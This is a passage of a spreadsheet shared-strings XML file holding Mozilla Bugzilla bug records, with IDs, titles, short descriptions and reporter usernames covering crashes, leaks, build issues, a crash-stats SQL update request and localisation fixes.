    <t>I think this is a result of the recent SETPROP work. Need to bisect.</t>
  </si>
  <si>
    <t>FIREFOX-320445</t>
  </si>
  <si>
    <t>crash when moving a folder to a different folder</t>
  </si>
  <si>
    <t>We have some wacky AdjustIndices ordering that causes us to notify for an item that doesn't exist.  Fix coming up.</t>
  </si>
  <si>
    <t>NSS-336521</t>
  </si>
  <si>
    <t>init.sh adds /bin and /usr/bin before ${DIST}/${OBJDIR}/bin to PATH</t>
  </si>
  <si>
    <t>The script tests/common/init.sh sets the PATH environment
variable so that the command-line tools such as certutil
under ${DIST}/${OBJDIR}/bin can be found.  However it
adds the system directories /bin and /usr/bin before
${DIST}/${OBJDIR}/bin to PATH.  So if your system has
a certutil installed in /usr/bin our test scripts will
use that certutil instead of the one in the build tree.</t>
  </si>
  <si>
    <t>BUGZILLA-158236</t>
  </si>
  <si>
    <t>Remove 'watchfordiffs' column from namedqueries table</t>
  </si>
  <si>
    <t>I son't know what its for and 2.14 doesn't use it. Lets kill it.</t>
  </si>
  <si>
    <t>BUGZILLA-252810</t>
  </si>
  <si>
    <t>p1 critical not displayed in red when groups are used for bug.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.0 .NET CLR 1.0.3705 .NET CLR 1.1.4322)
Build Identifier: 
wtf?
if I unclick all my groups for the bug that is make it public then it will 
show up as red in my list.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>jpyeron</t>
  </si>
  <si>
    <t>CORE-305017</t>
  </si>
  <si>
    <t>Memory Leak: myspell object gets leaked</t>
  </si>
  <si>
    <t>in mozMySpell.cpp SetDictionary creates an instance of class myspell. This
object is never deleted in the destructor for mozMySpell.
allocator:
http://lxr.mozilla.org/mozilla/source/extensions/spellcheck/myspell/src/mozMySpell.cpp#137
failure to delete in the destructor:
http://lxr.mozilla.org/mozilla/source/extensions/spellcheck/myspell/src/mozMySpell.cpp#83</t>
  </si>
  <si>
    <t>CORE-359242</t>
  </si>
  <si>
    <t>remove nsXBLWindowDragHandler</t>
  </si>
  <si>
    <t>I think we can remove nsXBLWindowDragHandler.
As far as I see it is not used at all.</t>
  </si>
  <si>
    <t>CORE-485631</t>
  </si>
  <si>
    <t>Get assertion cannot call GetUsedBorder on a dirty frame not currently being reflowed during drawing on Fennec</t>
  </si>
  <si>
    <t>While running Fennec from trunk of moz-central I often get the assertion:
###!!! ASSERTION: cannot call GetUsedBorder on a dirty frame not currently being reflowed: 'nsLayoutUtils::sDisableGetUsedXAssertions || !NS_SUBTREE_DIRTY(this) || (GetStateBits() &amp; NS_FRAME_IN_REFLOW)' file c:/src/mozilla-central/layout/generic/nsFrame.cpp line 616
This usually occurs when part of the page has changed Stuart suspects its from our DrawWindow code.</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-398573</t>
  </si>
  <si>
    <t>Flatten dist/include then get rid of REQUIRES</t>
  </si>
  <si>
    <t>Created attachment 283580
Flatten dist/include rev. 1
We have had a deep dist/include/ structure for as long as I can remember where individual makefiles had to specify REQUIRES for other modules that they pull in. I don't believe that this structure is necessary any longer now that we have well-defined tiers: these tiers prevent base code from relying on app-tier highers that it shouldn't.
I want this for mozilla2 so that I can reorder things without worrying about keeping REQUIRES up to date but I don't see any reason we shouldn't land this now for 1.9.</t>
  </si>
  <si>
    <t>SEAMONKEY-230965</t>
  </si>
  <si>
    <t>Error: uncaught exception: [Exception... Component returned failure code: 0x80004005 (NS_ERROR_FAILURE) [nsIDOMWindowInternal.scrollMaxY]  location: JS frame :: chrome://messenger/content/mailWindowOverlay.js :: SpaceHit :: line 1757  data: no]</t>
  </si>
  <si>
    <t>Error: uncaught exception: [Exception... Component returned failure code:
0x80004005 (NS_ERROR_FAILURE) [nsIDOMWindowInternal.scrollMaxY]  nsresult:
0x80004005 (NS_ERROR_FAILURE)  location: JS frame ::
chrome://messenger/content/mailWindowOverlay.js :: SpaceHit :: line 1757  data: no]
This can happen when there's no view. the call should be wrapped in a try{}. if
it throws then imo we should advance to the next message.</t>
  </si>
  <si>
    <t>TOOLKIT-414050</t>
  </si>
  <si>
    <t>Add about:crashes support for other applications</t>
  </si>
  <si>
    <t>Spun off from bug 411490 add the default pref for Seamonkey Sunbird and Thunderbird.</t>
  </si>
  <si>
    <t>SEAMONKEY-142334</t>
  </si>
  <si>
    <t>Turn on nsNativeThemeGTK</t>
  </si>
  <si>
    <t>Tracking bug for turning on the GTK native theme implementation by default.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-490646</t>
  </si>
  <si>
    <t>Production Socorro execute SQL to add Firefox Versions</t>
  </si>
  <si>
    <t>Please execute the following SQL in production. It will updated the crash-stats search box with new Firefox versions.
INSERT INTO branches (product version branch) VALUES('Firefox' '3.0.8'
'1.9')
INSERT INTO branches (product version branch) VALUES('Firefox' '3.0.9pre'
'1.9')
INSERT INTO branches (product version branch) VALUES('Firefox' '3.0.9'
'1.9')
INSERT INTO branches (product version branch) VALUES('Firefox' '3.0.10pre'
'1.9')
INSERT INTO branches (product version branch) VALUES('Firefox' '3.0.10'
'1.9')
INSERT INTO branches (product version branch) VALUES('Firefox' '3.0.11pre'
'1.9')
INSERT INTO branches (product version branch) VALUES('Firefox' '3.5b4'
'1.9.1')
INSERT INTO branches (product version branch) VALUES('Firefox' '3.5b5pre'
'1.9.1')</t>
  </si>
  <si>
    <t>CORE-267005</t>
  </si>
  <si>
    <t>[FIXr]changing onsubmit dynamically doesn't work</t>
  </si>
  <si>
    <t xml:space="preserve">User-Agent:       Mozilla/5.0 (X11 U Linux i686 de-DE rv:1.7) Gecko/20040803 Firefox/0.9.3
Build Identifier: Mozilla/5.0 (X11 U Linux i686 de-DE rv:1.7) Gecko/20040803 Firefox/0.9.3
Changing the form.onsubmit-value (e.g. to prevent checking the inputs) by adding
a this.form.onsubmit=null return true to a submit-button in the form doesn't
work in Mozilla &amp; Firefox. See further down for workaround. 
Reproducible: Always
Steps to Reproduce:
1. load http://www.hernmarck.ch/a.html (or see aditional information)
2. press first button: alert with value og input appears - ok...
2. press second button change onsubmit and send - should be no alert
Actual Results:  
An alert box appears even if there is an onclick=this.form.onsubmit=null
return true on the second button. (onsubmit isn't changed to null)
Expected Results:  
send the form without showing the alert (without handling the original onsubmit
function).
Workaround:
read the value this.form.onsubmit then change it. E.g.:
onclick=a=this.form.onsubmit this.form.onsubmit = null return true
(last btton in my example).
Works as expected in Konqueror/Opera/Internet Explorer.
Doesn't work on Mozilla Firefox (Linux and Windows)
the code from my example:
  &lt;!--
   function test(t) {
    alert(t.i.value)
    return true
   }
  //--&gt;
   &lt;input type=submit name=test2 value=change onsubmit and send (bug)
onclick=this.form.onsubmit = null return true&gt;
   &lt;input type=submit name=test3 value=change onsubmit don't send
onclick=this.form.onsubmit = null return false&gt;
   &lt;input type=submit name=test4 value=show onsubmit (then try test2)
onclick=alert(this.form.onsubmit) return false&gt;
   &lt;input type=submit name=test5 value=workaround for mozilla (change and
submit) onclick=a=this.form.onsubmit this.form.onsubmit = null return
true&gt;
</t>
  </si>
  <si>
    <t>BUGZILLA-471771</t>
  </si>
  <si>
    <t>editflagtypes.cgi should display the number of flags per type</t>
  </si>
  <si>
    <t>In a similar way to editproducts.cgi and editcomponents.cgi displaying the number of bugs per product or per component editflagtypes.cgi should have a similiar feature for flags triaged per type and per status (? / - / +). Each number should also point to the corresponding buglist so that they can be triaged very easily if needed.</t>
  </si>
  <si>
    <t>CORE-38888</t>
  </si>
  <si>
    <t>[TXT-&gt;HTML] Make plain text tags removable</t>
  </si>
  <si>
    <t>mozTXTToHTMLConv
Would be nice if the user could remove (via CSS) the stars etc. from display.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-425067</t>
  </si>
  <si>
    <t>Fix German dictionary target locales</t>
  </si>
  <si>
    <t>Some German dictionaries have invalid target locales (de-DE-comb and de-DE-alt) those are not valid locales and should be shortened to de-DE after 3.2 goes live and the UI for this is available in the DevCP.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-362718</t>
  </si>
  <si>
    <t>[Cairo] broken focus ring on pre-filled/focused input fields</t>
  </si>
  <si>
    <t>When input fields are pre-filled and the focus is set (e.g. by javascript or going back to edit) the focus ring is incorrectly painted. Sometimes it doesn't surround the whole widget (Gmail) sometimes there is like a double ring (Bugzilla).
STR.
1. Start filing a bug in Bugzilla
2. before submitting go back to an already filled inputfield click in it
3. focus is set 
4. watch the double focus ring or partly painted focus ring (*).
(*) While typing all this I noticed both.
Since the Cairo landing.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-159670</t>
  </si>
  <si>
    <t>hemscott.com - blocks access to non IE browsers server-side</t>
  </si>
  <si>
    <t>If you visit the location above and click the link marked Click here for your
free 7 day trial the site gives the following erroneous error:
Welcome to Hemscott's Premium Site.
In order to access this site please upgrade your browser to IE4 or Higher.
[This occurs on both W98 and Linux]
I've already aked the webmaster to fix this and been told sorry we only support
IE. So perhaps you can have better luck! After all Mozilla is Higher than IE4
:-) And it doesn't need supporting - all they need to do is stop doing
server-side blocking.
Thanks a lot. 
Richard</t>
  </si>
  <si>
    <t>rn214</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-140487</t>
  </si>
  <si>
    <t>upgrade Perl modules on mothra to meet requirements of MyTop</t>
  </si>
  <si>
    <t>The Perl modules on mothra need to be upgraded to meet the requirements of
Bugzilla 2.16.  This includes the following modules:
Template Toolkit: 2.04 -&gt; 2.07 + FLUSH patch (bug 103778 attachment 79922)
(also Parse::Yapp version 0.32 or later to build a new Parser.pm after applying
the patch following the instructions in Template-Toolkit-2.07/parser/README)
File::Spec -&gt; 0.8 -&gt; 0.8.2
This would also be a good time to upgrade from Perl 5.6.0 to Perl 5.6.1 which
is a maintenance release that fixes a number of bugs in the older version.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-426096</t>
  </si>
  <si>
    <t>Wrong download links to Firefox nightlies</t>
  </si>
  <si>
    <t>Created attachment 312638
Fix links
(couldn't resist)</t>
  </si>
  <si>
    <t>SOCORRO-490162</t>
  </si>
  <si>
    <t>ECONNRESET searching for stack that contains nsFrameManager::ReResolveStyleContext</t>
  </si>
  <si>
    <t>Just trying to see if there are other crashes that implicate this but can't get answers. :-(</t>
  </si>
  <si>
    <t>CORE-755515</t>
  </si>
  <si>
    <t>Catch exceptions in error handlers/versionchange handlers</t>
  </si>
  <si>
    <t>BUGZILLA-500350</t>
  </si>
  <si>
    <t>[Oracle] Use of uninitialized value in pattern match (m//) at Bugzilla/DB/Schema/Oracle.pm line 149.</t>
  </si>
  <si>
    <t>Adding foreign key: bugs.assigned_to -&gt; profiles.userid...
Use of uninitialized value in pattern match (m//) at Bugzilla/DB/Schema/Oracle.pm line 149.
Adding foreign key: bugs.product_id -&gt; products.id...
Use of uninitialized value in pattern match (m//) at Bugzilla/DB/Schema/Oracle.pm line 149.
Adding foreign key: bugs.reporter -&gt; profiles.userid...
Use of uninitialized value in pattern match (m//) at Bugzilla/DB/Schema/Oracle.pm line 149.
Adding foreign key: bugs.component_id -&gt; components.id...
Use of uninitialized value in pattern match (m//) at Bugzilla/DB/Schema/Oracle.pm line 149.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-387426</t>
  </si>
  <si>
    <t>Bootstrap Tag::Bump substep fails to update all relevant tags in client.mk</t>
  </si>
  <si>
    <t>During the review for the final respin support patch (bug 372755) cf pointed out that the Bump substep doesn't correctly bump the tag for all of the tags in client.mk:
http://lxr.mozilla.org/mozilla/source/tools/release/Bootstrap/Step/Tag/Bump.pm#96
This code bumps MOZ_CO_TAG but doesn't bump NSPR_CO_TAG or the other _CO_TAGs it used to. This regressed in version 1.6 with the fix for bug 372759:
http://bonsai.mozilla.org/cvsview2.cgi?diff_mode=context&amp;whitespace_mode=show&amp;root=/cvsroot&amp;subdir=mozilla/tools/release/Bootstrap/Step/Tag&amp;command=DIFF&amp;root=/cvsroot&amp;file=Bump.pm&amp;rev1=1.5&amp;rev2=1.6#8</t>
  </si>
  <si>
    <t>MOZILLA.ORG-302393</t>
  </si>
  <si>
    <t>Create directory for cck</t>
  </si>
  <si>
    <t>I'd like a place to put cck builds so I was hoping for mozilla.org/cck
Thanks</t>
  </si>
  <si>
    <t>CORE-496783</t>
  </si>
  <si>
    <t>setParent shouldn't be virtual</t>
  </si>
  <si>
    <t>We could make setParent non virtual once bug 461921 is fixed. However nsHTMLListBulletAccessible overrides setParent and uses mWeakParent. This was introduced in bug 346721. I have no idea why weak parent is needed. I think we could remove it in the meantime.</t>
  </si>
  <si>
    <t>RHINO_GRAVEYARD-263935</t>
  </si>
  <si>
    <t>Bogus namespace match with qualified name</t>
  </si>
  <si>
    <t>-------- Original Message --------
Subject: Found a few E4X bugs
Date: Fri 30 Jul 2004 16:47:40 -0700
From: John Schneider 
Reply-To: 
Organization: AgileDelta Inc.
Description: Qualified names specifying all names in no namespace match all
names in all namespaces
Test case:
	var ns1 = new Namespace(http://www.ns1.com)
	var ns2 = new Namespace(http://www.ns2.com)
	var none = new Namespace()
	var x = 
	x.foo = one
	x.ns1::foo = two
	x.ns2::foo = three
	x.bar = four
	// print all names in no namespace 
	print(x.none::*)
Expected:
	one
	four
Actual:
	one
	two
	three
	four
-------------------------</t>
  </si>
  <si>
    <t>BUGZILLA-181221</t>
  </si>
  <si>
    <t>CSV reports on 2-d tables have header messed up</t>
  </si>
  <si>
    <t>If I plot component versus reporter and generate a CSV the first item in the
header is ...
Component / Reporter
when it should be 
Componenet / Reporter
This messes up excel at least.</t>
  </si>
  <si>
    <t>FIREFOX-330024</t>
  </si>
  <si>
    <t>New Folder button in Places doesn't work until an item in the right pane is selected</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8) Gecko/20060309 Firefox/1.5
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8) Gecko/20060309 Firefox/1.5
The right-hand New Folder button in Places window doesn't work. The left-hand does.
Both branch and trunk.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>TESTING-732325</t>
  </si>
  <si>
    <t>Intermittent Android TEST-UNEXPECTED-FAIL | | exception while running reftests</t>
  </si>
  <si>
    <t>Just reconnecting socket/unable to connect socket but it's a regexable pattern to RETRY on.
https://tbpl.mozilla.org/php/getParsedLog.php?id=9757680&amp;tree=Mozilla-Aurora
Android Tegra 250 mozilla-aurora opt test jsreftest-3 on 2012-03-01 16:23:18 PST for push c86866d1eddb
reconnecting socket
unable to connect socket
reconnecting socket
unable to connect socket
reconnecting socket
unable to connect socket
reconnecting socket
unable to connect socket
reconnecting socket
unable to connect socket
reconnecting socket
unable to connect socket
reconnecting socket
unable to connect socket
reconnecting socket
unable to connect socket
reconnecting socket
unable to connect socket
reconnecting socket
unable to connect socket
reconnecting socket
unable to connect socket
reconnecting socket
unable to connect socket
reconnecting socket
unable to connect socket
reconnecting socket
unable to connect socket
reconnecting socket
unable to connect socket
reconnecting socket
unable to connect socket
TEST-UNEXPECTED-FAIL | | exception while running reftests
program finished with exit code 1</t>
  </si>
  <si>
    <t>CORE-351688</t>
  </si>
  <si>
    <t>nsCSSFrameConstructor::ContentRemoved has a hopefully useless DEBUG oversafe null check of parentFrame</t>
  </si>
  <si>
    <t>CORE-25587</t>
  </si>
  <si>
    <t>Implement OpenType</t>
  </si>
  <si>
    <t>Subject: Re: Need OT font with ligatures for demo
Date: Fri 28 Jan 2000 09:22:44 -0800
From: Thomas Phinney 
To: opentype@list.sirius.com
In regards to OpenType in particular I don't think there's an
all-in-one-spot reference on InDesign's OpenType support (it's a little
spread out in the manual).
InDesign 1.0 supports the following OpenType features--which may or may not
be present in a given OpenType font though all these features are common
in Adobe's full-featured OpenType fonts:
- The all alternates feature is supported via the Insert Character
function with alternates available in a flyout from the initial character
within the Insert Character dialog/palette.
- Small caps (from lower-case)
- oldstyle proportional figures (proportional lining fugres and tabular
oldstyle figures are not supported however).
- All automatic ligatures in an OpenType font are on by default though
they can be turned off via formatting.
- formatting text as caps invokes the case feature which is primarily
used to shift punctuation to fit better in an all-caps setting this can be
seen as hyphens dashes parentheses braces and brackets shift vertically.
- InDesign supports the full OpenType GPOS kern feature including class
kerning and exceptions.
A few words on InDesign and Unicode:
Adobe InDesign's Unicode and language support is independent of the OS.
InDesign 1.0 only supports western languages as far as direct input goes.
However both Windows and Mac InDesign support import of Unicode text
files and Windows Word files continaing Unicode. This makes it possible to
import a file with (for example) Romanian Russian and Greek text into
InDesign even if editing and direct input in these languages is difficult
within InDesign. InDesign's Insert Character function allows access to any
glyph in the font like the Windows charmap accessory.
Therefore it is possible to build a document in say Word for Windows
using CE Greek and Cyrillic and import that document into InDesign
formatting it in an OpenType font that supports the same languages.
I hope this answers your question!
Thomas Phinney
Program Manager Western Fonts
Adobe Systems Incorporated</t>
  </si>
  <si>
    <t>CORE-295292</t>
  </si>
  <si>
    <t>[FIXr]crash when using fixed positioning with no data rendered inside element[@nsFrame::BoxReflow ]</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b2) Gecko/20050523 Firefox/1.0+
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b2) Gecko/20050523 Firefox/1.0+
When having a div using fixed positioning and no data in the innerhtml with
overflow:hidden firefox will hang/crash. Testcase will show it.
Reproducible: Always</t>
  </si>
  <si>
    <t>tonglebeak</t>
  </si>
  <si>
    <t>CORE-384637</t>
  </si>
  <si>
    <t>Self-referencing  causes stack overflow crash</t>
  </si>
  <si>
    <t>Created attachment 268544
testcase (hangs/crashes Firefox when loaded)
After about a minute of hanging and runaway memory allocation Firefox crashes with a stack overflow (mutual recursion between nsSVGUtils::PaintChildWithEffects and nsSVGMaskFrame::ComputeMaskAlpha).</t>
  </si>
  <si>
    <t>FIREFOX-391534</t>
  </si>
  <si>
    <t xml:space="preserve"> with id='' and name='' has unknown type ''</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a8pre) Gecko/2007080905 Minefield/3.0a8pre
After playing in Tools-&gt;Options I noticed the following warning-message in the Error Console (repeated many times) :
 with id='' and name='' has unknown type ''.
I tried to see what could have caused it and I found several sub-dialogs that triggered it when you open the dialog and then press ok (without really changing something) :
Advanced-&gt;General-&gt;Languages-&gt;Choose
Advanced-&gt;Network-&gt;Connection-&gt;Settings
Content-&gt;Javascript-&gt;Advanced
Content-&gt;Fonts&amp;Colors-&gt;Advanced
Content-&gt;Fonts&amp;Colors-&gt;Colors
Content-&gt;File Types-&gt;Manage
Privacy-Cookies-&gt;Show
Privacy-&gt;Private Data=&gt;Settings
etc...
It seems that every dialog box that has an 'ok' button triggers these warnings. The ones that have a 'close' button (for instance Privacy-Cookies-&gt;Exceptions) don't. Strange.
There are a few other bugs that speaks bout this but in specific dialogs :
bug 342254 bug 377001 bug 345599 . Steffen Wilberg has seen it too see bug 345599 comment 17</t>
  </si>
  <si>
    <t>jo.hermans</t>
  </si>
  <si>
    <t>WEBSITES-518996</t>
  </si>
  <si>
    <t>SPAM user page Distinctive_styles_of_ugg_boots</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1.4pre) Gecko/20090925 Shiretoko/3.5.4pre GTB5
Build Identifier: 
SPAM user page:
https://wiki.mozilla.org/index.php?title=Distinctive_styles_of_ugg_boots
Actual Results:  
Expected Results:  
Reproducible: Always
Steps to Reproduce:
1.Go to https://wiki.mozilla.org/index.php?title=Distinctive_styles_of_ugg_boots
2.Notice the spam content.
Actual Results:  
SPAM at wiki.mozilla.org
Expected Results:  
No spam.
Page was created by https://wiki.mozilla.org/User:Xiaoyuokokok</t>
  </si>
  <si>
    <t>carlos_alen</t>
  </si>
  <si>
    <t>NSS-66229</t>
  </si>
  <si>
    <t>NSS_Init/NSS_Initialize should fail if libfreebl_pure32/hybrid_3.so cannot be loaded</t>
  </si>
  <si>
    <t>NSS_Init and NSS_Initialize should fail if the libfreebl_pure32/hybrid_3.so
shared library cannot be loaded during NSS initialization.  Right now
NSS_Init/NSS_Initialize would still return successfully and the application
would crash later when NSS tries to find the internal slot.
This bug was reported on 32-bit Solaris but it should affect 32-bit HP-UX too.</t>
  </si>
  <si>
    <t>CORE-107122</t>
  </si>
  <si>
    <t xml:space="preserve"> elements  do not honor left and right margins in style</t>
  </si>
  <si>
    <t>One way to make a centered ruled with a proportional width is to set the left
and right margins in a style attribute.
Ex. (in XHTML) :  for a 20% with
rule.
Mozilla 0.9.5 Redhat 7 rpm build fails to honor the style whether the margins
are proportional or absolute.
In the proportional case the rule is offset to the right as much as 200% of the
screen width. The rule itself is about a 100% wide. You have to scroll by a
large amount to see it.
In the absolute case Mozilla correctly takes into account the left margin but
fails to honor the right margin. The rule seems to have a 100% width so you have
 to scroll to the right by the width of the left margin to see its end.
This behaviour shows up in xhtml and html (loose DTD). I did not test other
documents type.
The margins show up as expected under Netscape 4.78 Amaya 5.1 Internet
Explorer 5 (Windows 2K). Netscpae 6.1 (Windows 2K) exhibit the same behaviour as
Mozilla.
Cheers
Serge Torres
Ecole normale superieure</t>
  </si>
  <si>
    <t>Serge.Torres</t>
  </si>
  <si>
    <t>CORE-521257</t>
  </si>
  <si>
    <t>Support NPImageExpose in plugins</t>
  </si>
  <si>
    <t>Created attachment 405281
patch v.1
Some plugins (eg Flash on mobile linux distro Maemo) support a method that allows local rendering (eg. we pass an image buffer they draw directly into it).</t>
  </si>
  <si>
    <t>BUGZILLA-77697</t>
  </si>
  <si>
    <t>bugzilla-helper doesnt include PSM in components</t>
  </si>
  <si>
    <t>Under Step 3 Gather information bugzilla-helper doesnt include PSM in the
dropdown box to select a component to report a bug on.
The closest option (Security: Crypto) doesnt seem quite right and according to
that form has only one bug assigned to that component anyway.
PSM should be in that list.
Comparing the components available there with the ones on the advanced bug form
 a few other components may be missing too.</t>
  </si>
  <si>
    <t>pml</t>
  </si>
  <si>
    <t>FIREFOX_FOR_ANDROID_GRAVEYARD-494836</t>
  </si>
  <si>
    <t>###!!! ASSERTION: XPConnect is being called on a scope without a 'Components' property!:</t>
  </si>
  <si>
    <t>Created attachment 379634
A patch
Should remove controller.</t>
  </si>
  <si>
    <t>SEAMONKEY-406448</t>
  </si>
  <si>
    <t>Improve Mac installer (.dmg)</t>
  </si>
  <si>
    <t>Currently our .dmg files just contain the bare Seamonkey.app which you need to drag into /Applications (or whereever you want). 
Other applications usually provide fancy -) background images with supportive texts (eg. Firefox Thunderbird) or even links to /Applications (eg. Komodo) etc. 
Would be nice to have that too...</t>
  </si>
  <si>
    <t>CORE-615753</t>
  </si>
  <si>
    <t>Figure out buffering on android</t>
  </si>
  <si>
    <t>Currently things are sketchy. They need to be fixed.</t>
  </si>
  <si>
    <t>SEAMONKEY-176306</t>
  </si>
  <si>
    <t>Mozilla fails to build properly with Perl &lt; 5.6</t>
  </si>
  <si>
    <t>In config/rules.mk '--' is used as a delimiter between configuration options
passed to config/make-jars.pl. This support was not added until Getopt::Std
v1.02 which was included in Perl v5.6 and above. This causes the $defines not
to be set in config/make-jars.pl which in turn causes the preprocessor not to
work correctly (XP_UNIX and other defines are never set).</t>
  </si>
  <si>
    <t>TAMARIN_GRAVEYARD-418883</t>
  </si>
  <si>
    <t>use default namespace goes too deep</t>
  </si>
  <si>
    <t>The use default namespace pragma should only apply to entities defined on the same lexical level that it occurs on not to entities defined in nested levels.  (I don't know what the ES4 RI does but it should do the same thing.)
It's a serious problem that the default namespace goes deep it creates all sorts of obscure bugs.</t>
  </si>
  <si>
    <t>THUNDERBIRD-516384</t>
  </si>
  <si>
    <t>[Vista] New toolbar button icon improvements</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
Build Identifier: 
The new icon for the File toolbar button in the default Aero theme introduced in bug 506011 looks clipped at the bottom as if a pixel is missing.
Additionally the disabled Tags icon is nearly invisible because it blends into the toolbar background perfectly.
Screenshot coming up...
Reproducible: Always</t>
  </si>
  <si>
    <t>ts.bugzilla</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-282078</t>
  </si>
  <si>
    <t>Minor fixes for upcoming Welsh Firefox 1.0.1</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 cy-GB rv:1.7.3) Gecko/20040910
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 cy-GB rv:1.7.3) Gecko/20040910
We have completed first round of QA'ing the upcoming Welsh localisation of
Firefox (1.0.1). Builds we tested were:
http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/latest-aviary1.0-l10n/
All functionality works in Windows Linux and Mac.
However we would like to have some patches checked into CVS. They are merely
linguistic fixes - spelling and terminological consistency. The number of files
will have been kept to an absolute minimum. They have been tested by us and
passed all our checks fine.
We have an improved bookmarks.html with links to instead to Welsh newsfeeds from
the BBC and Welsh pages for Mozilla-Europe.org (translations to be sent to the
startpages email address).
Reproducible: Always</t>
  </si>
  <si>
    <t>dewi.jones</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-465878</t>
  </si>
  <si>
    <t>Recreating Preferences Manager on shutdown</t>
  </si>
  <si>
    <t>Smokey thinks smfr fixed this at least once before though I can't find anything.
Debug builds as of sometime in the last couple months are logging Recreating preferences manager on shutdown! when quit. I don't know if it's a serious problem but I'm pretty sure the cause is this from the patch on bug 384689:
 - (void) dealloc
 {
   [[NSNotificationCenter defaultCenter] removeObserver:self]
+  [[PreferenceManager sharedInstance] removeObserver:self forPref:kGeckoPrefInlineLocationBarAutocomplete]
   [self cleanup]
   [super dealloc]
 }
Do we actually need to remove the Gecko pref observer since the PreferenceManager has already been destroyed at that point? I assumed we did but maybe we don't.</t>
  </si>
  <si>
    <t>SEAMONKEY-232452</t>
  </si>
  <si>
    <t>When starting up online prompt to send unsent messages</t>
  </si>
  <si>
    <t>E-mail messages composed off line and stored in folder 'Unsent Messages' do not
get sent when starting T-Bird on-line. When starting Netscape Messenger on-line
you are always prompted to send messages. In T-Bird no prompt and you realize
hours later that these eariler off-line messages are still not sent.</t>
  </si>
  <si>
    <t>TOOLKIT_GRAVEYARD-504437</t>
  </si>
  <si>
    <t>blocklist and update requests have bogus information on WinCE</t>
  </si>
  <si>
    <t>WinCE builds make blocklist requests like this
https://addons.mozilla.org/blocklist/3/%7Bec8030f7-c20a-464f-9b0e-13a3a9e97384%7D/3.6a1pre/Firefox/20090715145613/WINCE_unknownABI/en-US/nightly/Windows_Unknown%200.0/default/default/
Problems
1 - WINCE_unknownABI is substituted for %BUILD_TARGET%. Something to be defined in XRE I'm guessing.
2 - Windows_Unknown%200.0 is substituted for %OS_VERSION%. OS lookup needs to some help not sure if the second is from XRE or not. 
Update requests need this data too (mostly what I'm interested in!).</t>
  </si>
  <si>
    <t>TESTING-420084</t>
  </si>
  <si>
    <t>reftest should use nsIXULRuntime.widgetToolkit instead of autoconf.js</t>
  </si>
  <si>
    <t>I don't think reftest needs anything other than the OS for skipping tests am I right? It should just use nsIXULRuntime.OS instead then we could get rid of autoconf.js. I'd like to see reftest packaged as an extension at some point and this would be a necessary step.
xr = Components.classes[@mozilla.org/xre/app-info1].getService(Components.interfaces.nsIXULRuntime)
xr.OS</t>
  </si>
  <si>
    <t>CORE-470914</t>
  </si>
  <si>
    <t>add a __LOCATION__ field to the global object for files loaded on the commandline in xpcshell</t>
  </si>
  <si>
    <t>Created attachment 354293
add __LOCATION__ to files loaded on the xpcshell commandline
JS Components loaded via the component loader get a nice __LOCATION__ field on the global object--a nsILocalFile containing the full path to the script being loaded. We should add this same field to files loaded from the commandline in xpcshell. This patch basically copies the logic from the component loader into xpcshell.
This would be specifically useful for me in fixing bug 421611 since the mochitest server.js needs to know where its test path is and it currently relies on finding the current process directory and then hard coding the _tests/testing/mochitest path from there. With this patch it could just use __LOCATION__.parent instead.</t>
  </si>
  <si>
    <t>NSPR-279071</t>
  </si>
  <si>
    <t>Duplicate #define of MAX_POLLING_INTERVAL</t>
  </si>
  <si>
    <t>this is defined in two places in the same file
see:
http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/nsprpub/pr/include/private/pprmwait.h&amp;rev=3.6&amp;root=/cvsroot&amp;mark=4749#38
Checked from trunk not branch.</t>
  </si>
  <si>
    <t>THUNDERBIRD-495419</t>
  </si>
  <si>
    <t>Port tango smiley icons to XP theme</t>
  </si>
  <si>
    <t>Bug 490784 updated the icons for the message compose window among them the smiley dropdown menu. The smileys inside the menu didn't get updated though.</t>
  </si>
  <si>
    <t>CALENDAR-365644</t>
  </si>
  <si>
    <t>Cambodian Public Holidays .ics file</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-GB rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1
Build Identifier: 
.ics file of Cambodian public holidays. These dates taken from those published by a local bank (ANZ Royal).
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>dunbla</t>
  </si>
  <si>
    <t>CORE-28660</t>
  </si>
  <si>
    <t>Interface headers contain implementation</t>
  </si>
  <si>
    <t>nsIServiceManager.h and nsIComponentManager.h contains implementation code that 
makes inclusion into external component code (e.g. Java Plugin) problematic.</t>
  </si>
  <si>
    <t>jeff.dyer</t>
  </si>
  <si>
    <t>CORE-361822</t>
  </si>
  <si>
    <t>Native font names are no longer required in font.name-list.* for CJK fonts</t>
  </si>
